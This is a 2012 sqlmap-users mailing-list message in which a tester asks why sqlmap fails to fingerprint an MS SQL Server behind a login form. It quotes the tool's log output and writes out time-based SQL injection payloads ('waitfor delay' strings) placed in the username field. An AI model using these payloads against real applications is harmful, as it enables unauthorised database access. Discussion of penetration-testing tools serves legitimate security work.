Re: [sqlmap-users] Time based injection fails to fingerprint the DBMS
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Time based injection fails to fingerprint the DBMS
|
From: Chris O. <chr...@gm...> - 2012-01-22 18:18:57
|
In fact, don't worry about suggestions for manual syntax, te...@te...'if 1 = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why sqlmap is struggling? Chris On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote: > Hi > > I've got a web app where the username field of the login form is affected > by the following string: te...@te...'waitfor delay'0:0:10'-- as a > username; i.e. the delay happens, the app is vulnerable. It will always > then return you to the login screen with an invalid email error, but we > should still be able to exploit the app using time based methods. Sqlmap > picks up on this, but then fails at the fingerprinting stage, i.e: > > [18:04:03] [INFO] testing MySQL > [18:04:03] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > [18:04:16] [CRITICAL] there is considerable lagging in connection > response(s). Please use as high value for --time-sec option as p > ossible (e.g. 10 or more) > [18:04:16] [WARNING] the back-end DBMS is not MySQL > [18:04:16] [INFO] testing Oracle > [18:04:17] [WARNING] it is very important not to stress the network > adapter's bandwidth during usage of time-based queries > [18:04:17] [WARNING] the back-end DBMS is not Oracle > [18:04:17] [INFO] testing PostgreSQL > [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL > [18:04:17] [INFO] testing Microsoft SQL Server > [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server > [18:04:18] [INFO] testing SQLite > [18:04:18] [WARNING] the back-end DBMS is not SQLite > [18:04:18] [INFO] testing Microsoft Access > [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access > [18:04:18] [INFO] testing Firebird > [18:04:19] [WARNING] the back-end DBMS is not Firebird > [18:04:19] [INFO] testing SAP MaxDB > [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB > [18:04:19] [INFO] testing Sybase > [18:04:19] [WARNING] the back-end DBMS is not Sybase > [18:04:19] [INFO] testing IBM DB2 > [18:04:19] [WARNING] the back-end DBMS is not IBM DB2 > [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end > database management system. Support for this DBMS will be im > plemented at some point > > I'm not sure why this would be the case, it should be able to find that > its MS SQL Server. > > Any ideas why this might be the case? I can provide more verbose > information if required, let me know. > > In the mean time, any ideas for some more manual injections taking into > account the syntax of the injection above? I'm going to have a manual play > now but I thought you might want to know wrt sqlmap. > > Cheers > > Chris > |
